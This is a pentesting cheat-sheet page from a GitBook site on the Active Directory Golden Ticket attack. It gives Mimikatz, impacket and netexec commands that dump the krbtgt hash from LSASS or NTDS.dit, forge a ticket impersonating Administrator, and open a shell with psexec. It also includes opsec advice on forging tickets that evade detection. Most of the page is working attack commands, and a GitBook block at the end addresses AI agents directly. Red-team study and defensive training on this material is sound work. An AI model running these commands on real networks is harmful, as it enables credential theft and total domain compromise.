> For the complete documentation index, see [llms.txt](https://ivalexev.gitbook.io/rednote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/golden-ticket.md). # Golden Ticket Consist on the creation of a legitimate Ticket Granting Ticket (TGT) impersonating any user through the use of the NTLM **hash of the AD krbtgt account**. This technique is particularly advantageous because it enables access to any service or machine within the domain as the impersonated user. It's crucial to remember that the krbtgt account's credentials are never automatically updated. ## NTLM Hash of krbtgt Domain admin privileges or a similar level of access is typically required to acquire the NTLM hash of the krbtgt account. It can be extracted from the LSASS process or the NTDS.dit file located on any Domain Controller (DC) within the domain. Furthermore, executing a [DCsync attack](/rednote/pentesting-process/active-directory/dc-synchronization.md) is another strategy to obtain this NTLM hash. {% tabs %} {% tab title="Locally" %} Use [Mimikatz](https://github.com/gentilkiwi/mimikatz) {% code overflow="wrap" %} ```powershell .\mimikatz.exe privilege::debug lsadump::lsa /inject /name:krbtgt ``` {% endcode %} {% endtab %} {% tab title="Remotely" %} Use [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) {% code overflow="wrap" %} ```bash secretsdump.py /:''@ | grep krbtgt ``` {% endcode %} SID Domain with [impacket-lookupsid.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) {% code overflow="wrap" %} ```bash lookupsid.py /:''@ | grep -i "domain sid" ``` {% endcode %} Or with netexec {% code overflow="wrap" %} ```bash nxc ldap -u '' -p --get-sid nxc smb -u '' -H --ntds ``` {% endcode %} {% endtab %} {% endtabs %} ## Attack {% tabs %} {% tab title="Locally" %} With [Mimikatz](https://github.com/gentilkiwi/mimikatz) {% code overflow="wrap" %} ```powershell kerberos::golden /User:Administrator /domain: /sid: /krbtgt: /id:500 /ptt ``` {% endcode %} We can then create a separate command shell, using the Golden Ticket, with the following command: {% code overflow="wrap" %} ```powershell misc::cmd ``` {% endcode %} Although the NTLM hash serves as a viable method for this purpose, it is strongly recommended to forge tickets using the Advanced Encryption Standard (AES) Kerberos keys (AES128 and AES256) for operational security reasons. {% endtab %} {% tab title="Remotely" %} With [Impacket-ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) {% code overflow="wrap" %} ```bash ticketer.py -nthash -domain-sid -domain Administrator ``` {% endcode %} {% code overflow="wrap" %} ```bash ticketer.py -nthash -domain-sid -domain ``` {% endcode %} Now import the ticket and use it ```bash export KRB5CCNAME=.ccache ``` {% code overflow="wrap" %} ```bash psexec.py . -target-ip -dc-ip -k -no-pass ``` {% endcode %} {% endtab %} {% endtabs %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/golden-ticket.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.